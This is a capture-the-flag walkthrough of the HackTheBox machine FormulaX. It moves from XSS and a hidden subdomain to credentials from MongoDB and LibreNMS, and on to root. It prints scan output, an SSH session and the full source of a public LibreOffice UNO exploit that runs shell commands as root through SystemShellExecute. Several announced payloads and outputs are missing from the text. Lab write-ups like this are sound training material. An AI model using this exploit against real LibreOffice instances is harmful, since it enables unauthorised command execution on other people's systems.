FormulaX is a hard-difficulty machine from HackTheBox, where we initially have an XSS foothold to be able to access a hidden subdomain with CVE-2022-24439. Later obtaining hidden credentials from a mongo database to acquire our user flag. And finally taking advantage of exposed credentials using librenms and utilizing a public exploit of LibreOffice to obtain our root flag.
PS C:\Users\0xkujen> nmap -A-Pn10.129.230.190 Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-1620:39 W. Central Africa Standard Time NSOCK ERROR [0.2640s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for10.129.230.190 Host is up (0.35s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2565fb2cd54e447d10e9e8135923cd6a3cb (ECDSA) |_ 256 b9f00ddc057bfafb91e6d0b459e6db88 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) | http-title: Site doesn't have a title (text/html; charset=UTF-8). |_Requested resource was /static/index.html |_http-cors: GET POST No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=8/16%OT=22%CT=1%CU=33472%PV=Y%DS=2%DC=T%G=Y%TM=66BFAB7 OS:9%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I)SEQ( OS:CI=Z%II=I)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=B)OPS(O1=M54EST11NW OS:7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST OS:11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40 OS:%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R OS:=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%U OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1723/tcp) HOP RTT ADDRESS 1 477.00 ms 10.10.16.1 2 477.00 ms 10.129.230.190 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 129.08 seconds
We can see that we have OpenSSH running on port 22, and web application exposed on port 80.
But seems we’re getting an error about an unsupported Method. This made me think that my code is not suitable to this XSS especially. Digging a bit deeper, I discovered a chat.js file that provided me with a lot of help regarding communications in this web app: XSS
This script allowed me to deeply understand the communications happening in the back-end of how the chatbot is interpreting messages, and allowed me to craft this payload:
PS C:\Users\0xkujen> ssh [email protected] [email protected]'s password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-97-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Fri Aug 16 17:33:09 2024 from 10.10.x.x frank_dorky@formulax:~$ id uid=1002(frank_dorky) gid=1002(frank_dorky) groups=1002(frank_dorky) frank_dorky@formulax:~$ ls user.txt frank_dorky@formulax:~$ cat user.txt 08c82572ce4de9****************** frank_dorky@formulax:~$
Pivoting from frank_dorky to kai_relay
Checking the /opt folder, I found an unusual folder which is librenms
1
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems including Cisco, Linux, FreeBSD, Juniper, Brocade, Foundry, HP and many more.
Checking the public github repo for librenms, I find an interesting configuration file which is config_to_json.php which allows you to extract and utilize the configuration data from LibreNMS in a structured format like JSON, possibly for integration, automation, or debugging purposes.
Running that file we get interesting output with credentials to kai_relay:
This script launches LibreOffice Calc in a headless mode, setting it up to listen for connections on localhost:2002. This allows other programs or scripts to remotely control LibreOffice, typically for automating tasks such as document processing or conversion.
Checking for any public exploits for this binary we get an interesting find : Soffice-Exploit
import uno from com.sun.star.system import XSystemShellExecute import argparse
parser = argparse.ArgumentParser() parser.add_argument('--host', help='host to connect to', dest='host', required=True) parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args() # Define the UNO component localContext = uno.getComponentContext()
# Define the resolver to use, this is used to connect with the API resolver = localContext.ServiceManager.createInstanceWithContext( "com.sun.star.bridge.UnoUrlResolver", localContext )
# Connect with the provided host on the provided target port print("[+] Connecting to target...") context = resolver.resolve( "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe service_manager = context.ServiceManager print("[+] Connected to {0}".format(args.host)) shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute") shell_execute.execute("/usr/bin/cat", "/root/root.txt",1)
The first step is to run the /usr/bin/office.sh bash script in a seperate ssh session, later running our exploit. We run it and we get our root flag:
